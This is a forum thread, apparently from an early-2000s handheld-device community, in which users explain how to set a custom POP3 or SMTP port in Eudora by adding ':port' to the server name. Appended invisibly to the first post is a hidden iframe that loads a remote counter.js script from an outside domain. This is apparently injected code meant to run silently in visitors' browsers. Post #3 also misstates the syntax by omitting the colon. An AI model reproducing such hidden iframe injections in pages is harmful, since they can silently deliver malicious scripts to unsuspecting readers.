+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    Registered User
    Join Date
    02-17-2003
    Posts
    8

    How to change port POP3 Eudora mail uses?

    Anyone know of a way to change the port that Eudora mail uses to connect a POP3 server. The standard port is 110, my server uses a customized port number. I didn’t see any options to change this in preferences.

    Is there a script or file that could possibly be edited or perhaps a different email client with this functionality?

    Thanks!<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Just an Idea... Try specifying the port with the servername. Like mail.myserver.com:1234 --- I'm not sure if it will work but worth a shot. Good luck.
    iPhone therefore iAm.

  3. #3
    Registered User
    Join Date
    02-17-2003
    Posts
    8
    Thanks! After an extensive search I found some similar information.

    I have tested it and it does work.

    So to change default port for Eudora Mail from 110 to one your ISP specifies, do the following:

    Start Eudora Mail app > Select Options > Accounts > Select account to modify then on Basic tab modify incoming server to read: mail.yourserver.comxxx where xxxx is the port number.

    Cheers! :drink1

  4. #4
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Steve
    Just an Idea... Try specifying the port with the servername. Like mail.myserver.com:1234 --- I'm not sure if it will work but worth a shot. Good luck.
    Great call Steve.... you are on a roll!

    I'm a SnapperMail man (where setting the port is a field of its own), but it did bug me that I couldn't send outgoing mail from Eudora e-mail because of the port issue. Now I'll probably never use Eudora again................... but at least I know it works if someday I need it for an emergency to send an e-mail
    Please visit my picture site: Robert-O-Rama :)

  5. #5
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    I agree with that --- I like to make everything work just cause Its there and I can!
    iPhone therefore iAm.

  6. #6
    Registered User Robert K.'s Avatar
    Join Date
    06-18-2002
    Location
    DC/Balt area
    Posts
    4,827
    Originally posted by Steve
    I agree with that --- I like to make everything work just cause Its there and I can!
    lol... exactly!
    Please visit my picture site: Robert-O-Rama :)

  7. #7
    Techguru alanb's Avatar
    Join Date
    10-30-2002
    Location
    dc-baltimore megalopolis
    Posts
    2,184
    Originally posted by Steve
    Just an Idea... Try specifying the port with the servername. Like mail.myserver.com:1234 --- I'm not sure if it will work but worth a shot. Good luck.
    Steve, you rock man!

    I run my own mail server, but I use a different port for outgoing mail that does not originate on my LAN then I use for for incoming mail. Works fine on the laptop, but I have been unable to get it to work with Eudora mail, and although MobileMail supports changing the port, it only does if the server supports ESMTP. It is sending a command that my server doesn't understand when I select ESMTP. I used this trick in Eudora and it is working great. No more need for airbridge.net for me....

    Thanks,

    Alan

  8. #8
    Registered User Steve's Avatar
    Join Date
    10-02-2002
    Posts
    1,694
    Your welcome!

    Glad you have it working.
    iPhone therefore iAm.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts